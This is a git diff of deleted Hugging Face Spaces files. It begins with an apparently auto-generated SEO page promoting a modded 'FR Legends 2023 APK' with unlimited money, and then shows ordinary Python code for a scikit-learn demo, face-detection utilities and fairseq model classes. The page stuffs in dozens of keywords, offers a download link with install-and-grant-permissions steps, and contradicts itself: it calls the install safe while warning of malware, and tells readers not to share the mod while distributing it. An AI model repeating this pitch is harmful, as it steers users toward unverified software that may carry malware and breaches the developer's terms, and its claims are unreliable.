      • To earn more money, you need to complete missions, challenges, and events. You can also watch videos or share the game on social media to get extra rewards.
      • -
      • To customize your car, you need to go to the garage menu and select the parts you want to change. You can also preview the changes before applying them.
      • -
      • To create your own track, you need to go to the track editor menu and use the tools provided. You can also save and share your tracks with other players.
      • -
      • To play online, you need to go to the online menu and choose a mode. You can either join a random room or create your own room. You can also invite your friends or chat with other players.
      • -
      -

      Why choose FR Legends 2023 APK?

      -

      You might be wondering why you should choose FR Legends 2023 APK over the original game. Well, there are many benefits and risks of using this modified version of the game. Let's take a look at them:

      -

      fr legends drift game 2023 apk
      -download fr legends mod apk unlimited money 2023
      -fr legends android 2023 apk free download
      -fr legends car customization 2023 apk
      -fr legends latest version 2023 apk
      -fr legends hack apk 2023 no root
      -fr legends online multiplayer 2023 apk
      -fr legends new update 2023 apk
      -fr legends best settings 2023 apk
      -fr legends pc download 2023 apk
      -fr legends ios 2023 apk
      -fr legends mod menu 2023 apk
      -fr legends cheats 2023 apk
      -fr legends engine swap 2023 apk
      -fr legends wallpaper 2023 apk
      -fr legends tips and tricks 2023 apk
      -fr legends gameplay 2023 apk
      -fr legends review 2023 apk
      -fr legends tutorial 2023 apk
      -fr legends guide 2023 apk
      -fr legends soundtrack 2023 apk
      -fr legends controller support 2023 apk
      -fr legends livery codes 2023 apk
      -fr legends discord server 2023 apk
      -fr legends reddit community 2023 apk
      -fr legends facebook group 2023 apk
      -fr legends instagram page 2023 apk
      -fr legends youtube channel 2023 apk
      -fr legends twitch streamers 2023 apk
      -fr legends tiktok videos 2023 apk
      -fr legends memes 2023 apk
      -fr legends fan art 2023 apk
      -fr legends merchandise 2023 apk
      -fr legends stickers 2023 apk
      -fr legends decals 2023 apk
      -fr legends shirts 2023 apk
      -fr legends hoodies 2023 apk
      -fr legends hats 2023 apk
      -fr legends mugs 2023 apk
      -fr legends keychains 2023 apk
      -fr legends toys 2023 apk
      -fr legends models 2023 apk
      -fr legends posters 2023 apk
      -fr legends wallpapers hd 2023 apk
      -fr legends live wallpaper 2023 apk
      -fr legends theme song 2023 apk
      -fr legends ringtone 2023 apk
      -fr legends trivia quiz 2023 apk
      -fr legends crossword puzzle 2023 apk

      -

      Benefits of FR Legends 2023 APK

      -

      Unlimited money and unlocked cars

      -

      The most obvious benefit of FR Legends 2023 APK is that it gives you unlimited money and unlocked cars. This means that you can buy any car you want, upgrade it to the max, and customize it to your liking. You don't have to worry about running out of money or grinding for hours to unlock new cars. You can also try out different cars and see which one suits your style best.

      -

      No ads and no root needed

      -

      Another benefit of FR Legends 2023 APK is that it removes all the ads from the game. This means that you can enjoy the game without any interruptions or distractions. You don't have to watch videos or wait for timers to get extra money or rewards. You can also save your data and battery by not loading any ads. Moreover, you don't need to root your device to use this modified version of the game. This means that you can install it easily and safely without risking any damage or warranty issues.

      -

      Latest version and updates

      -

      The last benefit of FR Legends 2023 APK is that it is based on the latest version of the game. This means that you can enjoy all the new features and improvements that the developers have added to the game. You can also get regular updates from this modified version of the game, as long as you download it from a trusted source. You don't have to worry about missing out on any bug fixes or content updates.

      -

      Risks of FR Legends 2023 APK

      -

      Potential malware and viruses

      -

      The first risk of FR Legends 2023 APK is that it might contain malware or viruses that can harm your device or steal your data. This is because this modified version of the game is not verified by Google Play Store or any other official source. Therefore, you need to be careful where you download it from and what permissions you grant it. You should also scan it with an antivirus app before installing it.

      -

      Legal issues and bans

      -

      The second risk of FR Legends 2023 APK is that it might violate some legal terms and conditions of the original game. This is because this modified version of the game alters some aspects of the game that are protected by the game's developer and publisher. Therefore, you might face some legal issues or consequences if you use this modified version of the game. You might also get banned from the online mode or the leaderboards if the game detects that you are using a hacked version of the game. You should also respect the intellectual property and rights of the game's creator and not distribute or share this modified version of the game without their permission.

      -

      Data loss and corruption

      -

      The last risk of FR Legends 2023 APK is that it might cause data loss or corruption on your device or in the game. This is because this modified version of the game might not be compatible with your device or with the original game. Therefore, you might encounter some errors, glitches, crashes, or freezes while playing the game. You might also lose your progress, achievements, or rewards in the game if the modified version of the game overwrites or deletes them. You should always backup your data before installing or using this modified version of the game.

      -

      Conclusion

      -

      FR Legends is a fun and realistic drifting game that lets you drive and customize your favorite FR cars and tracks. You can also compete with other players online and show off your drifting skills. However, if you want to enjoy the game without any limitations or restrictions, you can try FR Legends 2023 APK, a modified version of the game that gives you unlimited money, unlocked cars, no ads, and more. However, you should also be aware of the risks involved in using this modified version of the game, such as potential malware, legal issues, and data loss. You should always download it from a trusted source and scan it with an antivirus app before installing it. You should also respect the game's developer and publisher and not distribute or share this modified version of the game without their permission.

      -

      We hope this article has helped you understand what FR Legends 2023 APK is, how to download and install it, why you should choose it, and what are the risks involved. If you have any questions or feedback, please feel free to leave a comment below. Thank you for reading!

      -

      FAQs

      -
        -
      • What is FR Legends?
        -FR Legends is a drifting game for mobile devices that lets you drive and customize your favorite FR cars and tracks.
      • -
      • What is FR Legends 2023 APK?
        -FR Legends 2023 APK is a modified version of the original game that gives you unlimited money, unlocked cars, no ads, and more.
      • -
      • How to download and install FR Legends 2023 APK?
        -You can download and install FR Legends 2023 APK by following these steps:
          -
        1. Click on this link to download the FR Legends 2023 APK file: [Download FR Legends 2023 APK].
        2. -
        3. Once the download is complete, locate the file in your device's file manager and tap on it to start the installation process.
        4. -
        5. Follow the instructions on the screen and grant the necessary permissions to the app.
        6. -
        7. Wait for the installation to finish and then launch the app from your home screen or app drawer.
        8. -
        9. Enjoy the game with unlimited money, unlocked cars, no ads, and more!
        10. -
      • -
      • Why choose FR Legends 2023 APK?
        -You should choose FR Legends 2023 APK if you want to enjoy the game without any limitations or restrictions. You can also access all the new features and updates that the original game has to offer.
      • -
      • What are the risks of FR Legends 2023 APK?
        -The risks of FR Legends 2023 APK are potential malware, legal issues, and data loss. You should always be careful where you download it from and what permissions you grant it. You should also backup your data before installing or using it. You should also respect the game's developer and publisher and not distribute or share this modified version of the game without their permission.
      • -

      401be4b1e0
      -
      -
      \ No newline at end of file diff --git a/spaces/sklearn-docs/Univariate-feature-selection/app.py b/spaces/sklearn-docs/Univariate-feature-selection/app.py deleted file mode 100644 index d5fadaf537c74d58e6f1e49727f374b7965fbd1b..0000000000000000000000000000000000000000 --- a/spaces/sklearn-docs/Univariate-feature-selection/app.py +++ /dev/null @@ -1,118 +0,0 @@ -import gradio as gr -import time -import numpy as np -import matplotlib.pyplot as plt -from sklearn.datasets import load_iris -from sklearn.model_selection import train_test_split -from sklearn.feature_selection import SelectKBest, f_classif -from sklearn.pipeline import make_pipeline -from sklearn.preprocessing import MinMaxScaler -from sklearn.svm import LinearSVC - -theme = gr.themes.Monochrome( - primary_hue="indigo", - secondary_hue="blue", - neutral_hue="slate", -) -model_card = f""" -## Description - -**Univariate feature selection** can be used to improve classification accuracy on a noisy dataset. -In **univariate feature selection**, each feature is evaluated independently, and a statistical test is used to determine its strength of association with the target variable. -The most important features are then selected based on their statistical significance, typically using a threshold p-value or a pre-defined number of top features to select. - -In this demo, some noisy (non informative) features are added to the iris dataset then use **Support vector machine (SVM)** to classify the Iris dataset both before and after applying univariate feature selection. -The results of the feature selection are presented through p-values and weights of SVMs, which are plotted for comparison. -The objective of this demo is to evaluate the accuracy of the models and assess the impact of univariate feature selection on the model weights. -You can play around with different ``number of top features`` and ``random seed``. - -## Dataset - -Iris dataset -""" -# The iris dataset -X, y = load_iris(return_X_y=True) - -# Some noisy data not correlated -E = np.random.RandomState(42).uniform(0, 0.1, size=(X.shape[0], 20)) - -# Add the noisy data to the informative features -X = np.hstack((X, E)) - - -def do_train(k_features, random_state): - # Split dataset to select feature and evaluate the classifier - X_train, X_test, y_train, y_test = train_test_split(X, y, stratify=y, random_state=random_state) - selector = SelectKBest(f_classif, k=k_features) - selector.fit(X_train, y_train) - scores = -np.log10(selector.pvalues_) - scores /= scores.max() - - - fig1, axes1 = plt.subplots() - X_indices = np.arange(X.shape[-1]) - axes1.bar(X_indices - 0.05, scores, width=0.2) - axes1.set_title("Feature univariate score") - axes1.set_xlabel("Feature number") - axes1.set_ylabel(r"Univariate score ($-Log(p_{value})$)") - - clf = make_pipeline(MinMaxScaler(), LinearSVC()) - clf.fit(X_train, y_train) - - svm_weights = np.abs(clf[-1].coef_).sum(axis=0) - svm_weights /= svm_weights.sum() - - clf_selected = make_pipeline(SelectKBest(f_classif, k=k_features), MinMaxScaler(), LinearSVC()) - clf_selected.fit(X_train, y_train) - - svm_weights_selected = np.abs(clf_selected[-1].coef_).sum(axis=0) - svm_weights_selected /= svm_weights_selected.sum() - - fig2, axes2 = plt.subplots() - axes2.bar( - X_indices - 0.45, scores, width=0.2, label=r"Univariate score ($-Log(p_{value})$)" - ) - - axes2.bar(X_indices - 0.25, svm_weights, width=0.2, label="SVM weight") - - axes2.bar( - X_indices[selector.get_support()] - 0.05, - svm_weights_selected, - width=0.2, - label="SVM weights after selection", - ) - - axes2.set_title("Comparing feature selection") - axes2.set_xlabel("Feature number") - axes2.set_yticks(()) - axes2.axis("tight") - axes2.legend(loc="upper right") - - text = f"Classification accuracy without selecting features: {clf.score(X_test, y_test)*100:.2f}%. Classification accuracy after univariate feature selection: {clf_selected.score(X_test, y_test)*100:.2f}%" - - return fig1, fig2, text - - - -with gr.Blocks(theme=theme) as demo: - gr.Markdown(''' -
      -

      Univariate Feature Selection

      -
      - ''') - gr.Markdown(model_card) - gr.Markdown("Author: Vu Minh Chien. Based on the example from scikit-learn") - k_features = gr.Slider(minimum=2, maximum=10, step=1, value=2, label="Number of top features to select") - random_state = gr.Slider(minimum=0, maximum=2000, step=1, value=0, label="Random seed") - with gr.Row(): - with gr.Column(): - plot_1 = gr.Plot(label="Univariate score") - with gr.Column(): - plot_2 = gr.Plot(label="Comparing feature selection") - with gr.Row(): - resutls = gr.Textbox(label="Results") - - k_features.change(fn=do_train, inputs=[k_features, random_state], outputs=[plot_1, plot_2, resutls]) - random_state.change(fn=do_train, inputs=[k_features, random_state], outputs=[plot_1, plot_2, resutls]) - -demo.launch() \ No newline at end of file diff --git a/spaces/sky24h/Free-View_Expressive_Talking_Head_Video_Editing/face_detection/utils.py b/spaces/sky24h/Free-View_Expressive_Talking_Head_Video_Editing/face_detection/utils.py deleted file mode 100644 index 3dc4cf3e328efaa227cbcfdd969e1056688adad5..0000000000000000000000000000000000000000 --- a/spaces/sky24h/Free-View_Expressive_Talking_Head_Video_Editing/face_detection/utils.py +++ /dev/null @@ -1,313 +0,0 @@ -from __future__ import print_function -import os -import sys -import time -import torch -import math -import numpy as np -import cv2 - - -def _gaussian( - size=3, sigma=0.25, amplitude=1, normalize=False, width=None, - height=None, sigma_horz=None, sigma_vert=None, mean_horz=0.5, - mean_vert=0.5): - # handle some defaults - if width is None: - width = size - if height is None: - height = size - if sigma_horz is None: - sigma_horz = sigma - if sigma_vert is None: - sigma_vert = sigma - center_x = mean_horz * width + 0.5 - center_y = mean_vert * height + 0.5 - gauss = np.empty((height, width), dtype=np.float32) - # generate kernel - for i in range(height): - for j in range(width): - gauss[i][j] = amplitude * math.exp(-(math.pow((j + 1 - center_x) / ( - sigma_horz * width), 2) / 2.0 + math.pow((i + 1 - center_y) / (sigma_vert * height), 2) / 2.0)) - if normalize: - gauss = gauss / np.sum(gauss) - return gauss - - -def draw_gaussian(image, point, sigma): - # Check if the gaussian is inside - ul = [math.floor(point[0] - 3 * sigma), math.floor(point[1] - 3 * sigma)] - br = [math.floor(point[0] + 3 * sigma), math.floor(point[1] + 3 * sigma)] - if (ul[0] > image.shape[1] or ul[1] > image.shape[0] or br[0] < 1 or br[1] < 1): - return image - size = 6 * sigma + 1 - g = _gaussian(size) - g_x = [int(max(1, -ul[0])), int(min(br[0], image.shape[1])) - int(max(1, ul[0])) + int(max(1, -ul[0]))] - g_y = [int(max(1, -ul[1])), int(min(br[1], image.shape[0])) - int(max(1, ul[1])) + int(max(1, -ul[1]))] - img_x = [int(max(1, ul[0])), int(min(br[0], image.shape[1]))] - img_y = [int(max(1, ul[1])), int(min(br[1], image.shape[0]))] - assert (g_x[0] > 0 and g_y[1] > 0) - image[img_y[0] - 1:img_y[1], img_x[0] - 1:img_x[1] - ] = image[img_y[0] - 1:img_y[1], img_x[0] - 1:img_x[1]] + g[g_y[0] - 1:g_y[1], g_x[0] - 1:g_x[1]] - image[image > 1] = 1 - return image - - -def transform(point, center, scale, resolution, invert=False): - """Generate and affine transformation matrix. - - Given a set of points, a center, a scale and a targer resolution, the - function generates and affine transformation matrix. If invert is ``True`` - it will produce the inverse transformation. - - Arguments: - point {torch.tensor} -- the input 2D point - center {torch.tensor or numpy.array} -- the center around which to perform the transformations - scale {float} -- the scale of the face/object - resolution {float} -- the output resolution - - Keyword Arguments: - invert {bool} -- define wherever the function should produce the direct or the - inverse transformation matrix (default: {False}) - """ - _pt = torch.ones(3) - _pt[0] = point[0] - _pt[1] = point[1] - - h = 200.0 * scale - t = torch.eye(3) - t[0, 0] = resolution / h - t[1, 1] = resolution / h - t[0, 2] = resolution * (-center[0] / h + 0.5) - t[1, 2] = resolution * (-center[1] / h + 0.5) - - if invert: - t = torch.inverse(t) - - new_point = (torch.matmul(t, _pt))[0:2] - - return new_point.int() - - -def crop(image, center, scale, resolution=256.0): - """Center crops an image or set of heatmaps - - Arguments: - image {numpy.array} -- an rgb image - center {numpy.array} -- the center of the object, usually the same as of the bounding box - scale {float} -- scale of the face - - Keyword Arguments: - resolution {float} -- the size of the output cropped image (default: {256.0}) - - Returns: - [type] -- [description] - """ # Crop around the center point - """ Crops the image around the center. Input is expected to be an np.ndarray """ - ul = transform([1, 1], center, scale, resolution, True) - br = transform([resolution, resolution], center, scale, resolution, True) - # pad = math.ceil(torch.norm((ul - br).float()) / 2.0 - (br[0] - ul[0]) / 2.0) - if image.ndim > 2: - newDim = np.array([br[1] - ul[1], br[0] - ul[0], - image.shape[2]], dtype=np.int32) - newImg = np.zeros(newDim, dtype=np.uint8) - else: - newDim = np.array([br[1] - ul[1], br[0] - ul[0]], dtype=np.int) - newImg = np.zeros(newDim, dtype=np.uint8) - ht = image.shape[0] - wd = image.shape[1] - newX = np.array( - [max(1, -ul[0] + 1), min(br[0], wd) - ul[0]], dtype=np.int32) - newY = np.array( - [max(1, -ul[1] + 1), min(br[1], ht) - ul[1]], dtype=np.int32) - oldX = np.array([max(1, ul[0] + 1), min(br[0], wd)], dtype=np.int32) - oldY = np.array([max(1, ul[1] + 1), min(br[1], ht)], dtype=np.int32) - newImg[newY[0] - 1:newY[1], newX[0] - 1:newX[1] - ] = image[oldY[0] - 1:oldY[1], oldX[0] - 1:oldX[1], :] - newImg = cv2.resize(newImg, dsize=(int(resolution), int(resolution)), - interpolation=cv2.INTER_LINEAR) - return newImg - - -def get_preds_fromhm(hm, center=None, scale=None): - """Obtain (x,y) coordinates given a set of N heatmaps. If the center - and the scale is provided the function will return the points also in - the original coordinate frame. - - Arguments: - hm {torch.tensor} -- the predicted heatmaps, of shape [B, N, W, H] - - Keyword Arguments: - center {torch.tensor} -- the center of the bounding box (default: {None}) - scale {float} -- face scale (default: {None}) - """ - max, idx = torch.max( - hm.view(hm.size(0), hm.size(1), hm.size(2) * hm.size(3)), 2) - idx += 1 - preds = idx.view(idx.size(0), idx.size(1), 1).repeat(1, 1, 2).float() - preds[..., 0].apply_(lambda x: (x - 1) % hm.size(3) + 1) - preds[..., 1].add_(-1).div_(hm.size(2)).floor_().add_(1) - - for i in range(preds.size(0)): - for j in range(preds.size(1)): - hm_ = hm[i, j, :] - pX, pY = int(preds[i, j, 0]) - 1, int(preds[i, j, 1]) - 1 - if pX > 0 and pX < 63 and pY > 0 and pY < 63: - diff = torch.FloatTensor( - [hm_[pY, pX + 1] - hm_[pY, pX - 1], - hm_[pY + 1, pX] - hm_[pY - 1, pX]]) - preds[i, j].add_(diff.sign_().mul_(.25)) - - preds.add_(-.5) - - preds_orig = torch.zeros(preds.size()) - if center is not None and scale is not None: - for i in range(hm.size(0)): - for j in range(hm.size(1)): - preds_orig[i, j] = transform( - preds[i, j], center, scale, hm.size(2), True) - - return preds, preds_orig - -def get_preds_fromhm_batch(hm, centers=None, scales=None): - """Obtain (x,y) coordinates given a set of N heatmaps. If the centers - and the scales is provided the function will return the points also in - the original coordinate frame. - - Arguments: - hm {torch.tensor} -- the predicted heatmaps, of shape [B, N, W, H] - - Keyword Arguments: - centers {torch.tensor} -- the centers of the bounding box (default: {None}) - scales {float} -- face scales (default: {None}) - """ - max, idx = torch.max( - hm.view(hm.size(0), hm.size(1), hm.size(2) * hm.size(3)), 2) - idx += 1 - preds = idx.view(idx.size(0), idx.size(1), 1).repeat(1, 1, 2).float() - preds[..., 0].apply_(lambda x: (x - 1) % hm.size(3) + 1) - preds[..., 1].add_(-1).div_(hm.size(2)).floor_().add_(1) - - for i in range(preds.size(0)): - for j in range(preds.size(1)): - hm_ = hm[i, j, :] - pX, pY = int(preds[i, j, 0]) - 1, int(preds[i, j, 1]) - 1 - if pX > 0 and pX < 63 and pY > 0 and pY < 63: - diff = torch.FloatTensor( - [hm_[pY, pX + 1] - hm_[pY, pX - 1], - hm_[pY + 1, pX] - hm_[pY - 1, pX]]) - preds[i, j].add_(diff.sign_().mul_(.25)) - - preds.add_(-.5) - - preds_orig = torch.zeros(preds.size()) - if centers is not None and scales is not None: - for i in range(hm.size(0)): - for j in range(hm.size(1)): - preds_orig[i, j] = transform( - preds[i, j], centers[i], scales[i], hm.size(2), True) - - return preds, preds_orig - -def shuffle_lr(parts, pairs=None): - """Shuffle the points left-right according to the axis of symmetry - of the object. - - Arguments: - parts {torch.tensor} -- a 3D or 4D object containing the - heatmaps. - - Keyword Arguments: - pairs {list of integers} -- [order of the flipped points] (default: {None}) - """ - if pairs is None: - pairs = [16, 15, 14, 13, 12, 11, 10, 9, 8, 7, 6, 5, 4, 3, 2, 1, 0, - 26, 25, 24, 23, 22, 21, 20, 19, 18, 17, 27, 28, 29, 30, 35, - 34, 33, 32, 31, 45, 44, 43, 42, 47, 46, 39, 38, 37, 36, 41, - 40, 54, 53, 52, 51, 50, 49, 48, 59, 58, 57, 56, 55, 64, 63, - 62, 61, 60, 67, 66, 65] - if parts.ndimension() == 3: - parts = parts[pairs, ...] - else: - parts = parts[:, pairs, ...] - - return parts - - -def flip(tensor, is_label=False): - """Flip an image or a set of heatmaps left-right - - Arguments: - tensor {numpy.array or torch.tensor} -- [the input image or heatmaps] - - Keyword Arguments: - is_label {bool} -- [denote wherever the input is an image or a set of heatmaps ] (default: {False}) - """ - if not torch.is_tensor(tensor): - tensor = torch.from_numpy(tensor) - - if is_label: - tensor = shuffle_lr(tensor).flip(tensor.ndimension() - 1) - else: - tensor = tensor.flip(tensor.ndimension() - 1) - - return tensor - -# From pyzolib/paths.py (https://bitbucket.org/pyzo/pyzolib/src/tip/paths.py) - - -def appdata_dir(appname=None, roaming=False): - """ appdata_dir(appname=None, roaming=False) - - Get the path to the application directory, where applications are allowed - to write user specific files (e.g. configurations). For non-user specific - data, consider using common_appdata_dir(). - If appname is given, a subdir is appended (and created if necessary). - If roaming is True, will prefer a roaming directory (Windows Vista/7). - """ - - # Define default user directory - userDir = os.getenv('FACEALIGNMENT_USERDIR', None) - if userDir is None: - userDir = os.path.expanduser('~') - if not os.path.isdir(userDir): # pragma: no cover - userDir = '/var/tmp' # issue #54 - - # Get system app data dir - path = None - if sys.platform.startswith('win'): - path1, path2 = os.getenv('LOCALAPPDATA'), os.getenv('APPDATA') - path = (path2 or path1) if roaming else (path1 or path2) - elif sys.platform.startswith('darwin'): - path = os.path.join(userDir, 'Library', 'Application Support') - # On Linux and as fallback - if not (path and os.path.isdir(path)): - path = userDir - - # Maybe we should store things local to the executable (in case of a - # portable distro or a frozen application that wants to be portable) - prefix = sys.prefix - if getattr(sys, 'frozen', None): - prefix = os.path.abspath(os.path.dirname(sys.executable)) - for reldir in ('settings', '../settings'): - localpath = os.path.abspath(os.path.join(prefix, reldir)) - if os.path.isdir(localpath): # pragma: no cover - try: - open(os.path.join(localpath, 'test.write'), 'wb').close() - os.remove(os.path.join(localpath, 'test.write')) - except IOError: - pass # We cannot write in this directory - else: - path = localpath - break - - # Get path specific for this app - if appname: - if path == userDir: - appname = '.' + appname.lstrip('.') # Make it a hidden directory - path = os.path.join(path, appname) - if not os.path.isdir(path): # pragma: no cover - os.mkdir(path) - - # Done - return path diff --git a/spaces/sriramelango/Social_Classification_Public/fairseq/fairseq/data/fairseq_dataset.py b/spaces/sriramelango/Social_Classification_Public/fairseq/fairseq/data/fairseq_dataset.py deleted file mode 100644 index 23e6992dbaf34e52f2fdcd0c8fc418c93744ea4e..0000000000000000000000000000000000000000 --- a/spaces/sriramelango/Social_Classification_Public/fairseq/fairseq/data/fairseq_dataset.py +++ /dev/null @@ -1,205 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -import logging -import numpy as np -import torch.utils.data -from fairseq.data import data_utils - -logger = logging.getLogger(__name__) - - -class EpochListening: - """Mixin for receiving updates whenever the epoch increments.""" - - @property - def can_reuse_epoch_itr_across_epochs(self): - """ - Whether we can reuse the :class:`fairseq.data.EpochBatchIterator` for - this dataset across epochs. - - This needs to return ``False`` if the sample sizes can change across - epochs, in which case we may need to regenerate batches at each epoch. - If your dataset relies in ``set_epoch`` then you should consider setting - this to ``False``. - """ - return True - - def set_epoch(self, epoch): - """Will receive the updated epoch number at the beginning of the epoch.""" - pass - - -class FairseqDataset(torch.utils.data.Dataset, EpochListening): - """A dataset that provides helpers for batching.""" - - def __getitem__(self, index): - raise NotImplementedError - - def __len__(self): - raise NotImplementedError - - def collater(self, samples): - """Merge a list of samples to form a mini-batch. - - Args: - samples (List[dict]): samples to collate - - Returns: - dict: a mini-batch suitable for forwarding with a Model - """ - raise NotImplementedError - - def num_tokens(self, index): - """Return the number of tokens in a sample. This value is used to - enforce ``--max-tokens`` during batching.""" - raise NotImplementedError - - def num_tokens_vec(self, indices): - """Return the number of tokens for a set of positions defined by indices. - This value is used to enforce ``--max-tokens`` during batching.""" - raise NotImplementedError - - def size(self, index): - """Return an example's size as a float or tuple. This value is used when - filtering a dataset with ``--max-positions``.""" - raise NotImplementedError - - def ordered_indices(self): - """Return an ordered list of indices. Batches will be constructed based - on this order.""" - return np.arange(len(self), dtype=np.int64) - - @property - def supports_prefetch(self): - """Whether this dataset supports prefetching.""" - return False - - def attr(self, attr: str, index: int): - return getattr(self, attr, None) - - def prefetch(self, indices): - """Prefetch the data required for this epoch.""" - raise NotImplementedError - - def get_batch_shapes(self): - """ - Return a list of valid batch shapes, for example:: - - [(8, 512), (16, 256), (32, 128)] - - The first dimension of each tuple is the batch size and can be ``None`` - to automatically infer the max batch size based on ``--max-tokens``. - The second dimension of each tuple is the max supported length as given - by :func:`fairseq.data.FairseqDataset.num_tokens`. - - This will be used by :func:`fairseq.data.FairseqDataset.batch_by_size` - to restrict batch shapes. This is useful on TPUs to avoid too many - dynamic shapes (and recompilations). - """ - return None - - def batch_by_size( - self, - indices, - max_tokens=None, - max_sentences=None, - required_batch_size_multiple=1, - ): - """ - Given an ordered set of indices, return batches according to - *max_tokens*, *max_sentences* and *required_batch_size_multiple*. - """ - from fairseq.data import data_utils - - fixed_shapes = self.get_batch_shapes() - if fixed_shapes is not None: - - def adjust_bsz(bsz, num_tokens): - if bsz is None: - assert max_tokens is not None, "Must specify --max-tokens" - bsz = max_tokens // num_tokens - if max_sentences is not None: - bsz = min(bsz, max_sentences) - elif ( - bsz >= required_batch_size_multiple - and bsz % required_batch_size_multiple != 0 - ): - bsz -= bsz % required_batch_size_multiple - return bsz - - fixed_shapes = np.array( - [ - [adjust_bsz(bsz, num_tokens), num_tokens] - for (bsz, num_tokens) in fixed_shapes - ] - ) - - try: - num_tokens_vec = self.num_tokens_vec(indices).astype('int64') - except NotImplementedError: - num_tokens_vec = None - - return data_utils.batch_by_size( - indices, - num_tokens_fn=self.num_tokens, - num_tokens_vec=num_tokens_vec, - max_tokens=max_tokens, - max_sentences=max_sentences, - required_batch_size_multiple=required_batch_size_multiple, - fixed_shapes=fixed_shapes, - ) - - def filter_indices_by_size(self, indices, max_sizes): - """ - Filter a list of sample indices. Remove those that are longer than - specified in *max_sizes*. - - WARNING: don't update, override method in child classes - - Args: - indices (np.array): original array of sample indices - max_sizes (int or list[int] or tuple[int]): max sample size, - can be defined separately for src and tgt (then list or tuple) - - Returns: - np.array: filtered sample array - list: list of removed indices - """ - if isinstance(max_sizes, float) or isinstance(max_sizes, int): - if hasattr(self, "sizes") and isinstance(self.sizes, np.ndarray): - ignored = indices[self.sizes[indices] > max_sizes].tolist() - indices = indices[self.sizes[indices] <= max_sizes] - elif ( - hasattr(self, "sizes") - and isinstance(self.sizes, list) - and len(self.sizes) == 1 - ): - ignored = indices[self.sizes[0][indices] > max_sizes].tolist() - indices = indices[self.sizes[0][indices] <= max_sizes] - else: - indices, ignored = data_utils._filter_by_size_dynamic( - indices, self.size, max_sizes - ) - else: - indices, ignored = data_utils._filter_by_size_dynamic( - indices, self.size, max_sizes - ) - return indices, ignored - - @property - def supports_fetch_outside_dataloader(self): - """Whether this dataset supports fetching outside the workers of the dataloader.""" - return True - - -class FairseqIterableDataset(torch.utils.data.IterableDataset, EpochListening): - """ - For datasets that need to be read sequentially, usually because the data is - being streamed or otherwise can't be manipulated on a single machine. - """ - - def __iter__(self): - raise NotImplementedError diff --git a/spaces/sriramelango/Social_Classification_Public/fairseq/fairseq/models/speech_to_text/berard.py b/spaces/sriramelango/Social_Classification_Public/fairseq/fairseq/models/speech_to_text/berard.py deleted file mode 100644 index c505e3acaa84e5f3263ccbfaf9556f77123f09fc..0000000000000000000000000000000000000000 --- a/spaces/sriramelango/Social_Classification_Public/fairseq/fairseq/models/speech_to_text/berard.py +++ /dev/null @@ -1,606 +0,0 @@ -#!/usr/bin/env python3 - -from ast import literal_eval -from typing import List, Tuple - -import torch -import torch.nn as nn -import torch.nn.functional as F -from fairseq import checkpoint_utils, utils -from fairseq.data.data_utils import lengths_to_padding_mask -from fairseq.models import ( - FairseqEncoder, - FairseqEncoderDecoderModel, - FairseqIncrementalDecoder, - register_model, - register_model_architecture, -) - - -@register_model("s2t_berard") -class BerardModel(FairseqEncoderDecoderModel): - """Implementation of a model similar to https://arxiv.org/abs/1802.04200 - - Paper title: End-to-End Automatic Speech Translation of Audiobooks - An implementation is available in tensorflow at - https://github.com/eske/seq2seq - Relevant files in this implementation are the config - (https://github.com/eske/seq2seq/blob/master/config/LibriSpeech/AST.yaml) - and the model code - (https://github.com/eske/seq2seq/blob/master/translate/models.py). - The encoder and decoder try to be close to the original implementation. - The attention is an MLP as in Bahdanau et al. - (https://arxiv.org/abs/1409.0473). - There is no state initialization by averaging the encoder outputs. - """ - - def __init__(self, encoder, decoder): - super().__init__(encoder, decoder) - - @staticmethod - def add_args(parser): - parser.add_argument( - "--input-layers", - type=str, - metavar="EXPR", - help="List of linear layer dimensions. These " - "layers are applied to the input features and " - "are followed by tanh and possibly dropout.", - ) - parser.add_argument( - "--dropout", - type=float, - metavar="D", - help="Dropout probability to use in the encoder/decoder. " - "Note that this parameters control dropout in various places, " - "there is no fine-grained control for dropout for embeddings " - "vs LSTM layers for example.", - ) - parser.add_argument( - "--in-channels", - type=int, - metavar="N", - help="Number of encoder input channels. " "Typically value is 1.", - ) - parser.add_argument( - "--conv-layers", - type=str, - metavar="EXPR", - help="List of conv layers " "(format: (channels, kernel, stride)).", - ) - parser.add_argument( - "--num-blstm-layers", - type=int, - metavar="N", - help="Number of encoder bi-LSTM layers.", - ) - parser.add_argument( - "--lstm-size", type=int, metavar="N", help="LSTM hidden size." - ) - parser.add_argument( - "--decoder-embed-dim", - type=int, - metavar="N", - help="Embedding dimension of the decoder target tokens.", - ) - parser.add_argument( - "--decoder-hidden-dim", - type=int, - metavar="N", - help="Decoder LSTM hidden dimension.", - ) - parser.add_argument( - "--decoder-num-layers", - type=int, - metavar="N", - help="Number of decoder LSTM layers.", - ) - parser.add_argument( - "--attention-dim", - type=int, - metavar="N", - help="Hidden layer dimension in MLP attention.", - ) - parser.add_argument( - "--output-layer-dim", - type=int, - metavar="N", - help="Hidden layer dim for linear layer prior to output projection.", - ) - parser.add_argument( - "--load-pretrained-encoder-from", - type=str, - metavar="STR", - help="model to take encoder weights from (for initialization)", - ) - parser.add_argument( - "--load-pretrained-decoder-from", - type=str, - metavar="STR", - help="model to take decoder weights from (for initialization)", - ) - - @classmethod - def build_encoder(cls, args, task): - encoder = BerardEncoder( - input_layers=literal_eval(args.input_layers), - conv_layers=literal_eval(args.conv_layers), - in_channels=args.input_channels, - input_feat_per_channel=args.input_feat_per_channel, - num_blstm_layers=args.num_blstm_layers, - lstm_size=args.lstm_size, - dropout=args.dropout, - ) - if getattr(args, "load_pretrained_encoder_from", None): - encoder = checkpoint_utils.load_pretrained_component_from_model( - component=encoder, checkpoint=args.load_pretrained_encoder_from - ) - return encoder - - @classmethod - def build_decoder(cls, args, task): - decoder = LSTMDecoder( - dictionary=task.target_dictionary, - embed_dim=args.decoder_embed_dim, - num_layers=args.decoder_num_layers, - hidden_size=args.decoder_hidden_dim, - dropout=args.dropout, - encoder_output_dim=2 * args.lstm_size, # bidirectional - attention_dim=args.attention_dim, - output_layer_dim=args.output_layer_dim, - ) - if getattr(args, "load_pretrained_decoder_from", None): - decoder = checkpoint_utils.load_pretrained_component_from_model( - component=decoder, checkpoint=args.load_pretrained_decoder_from - ) - return decoder - - @classmethod - def build_model(cls, args, task): - """Build a new model instance.""" - encoder = cls.build_encoder(args, task) - decoder = cls.build_decoder(args, task) - - return cls(encoder, decoder) - - def get_normalized_probs(self, net_output, log_probs, sample=None): - # net_output['encoder_out'] is a (B, T, D) 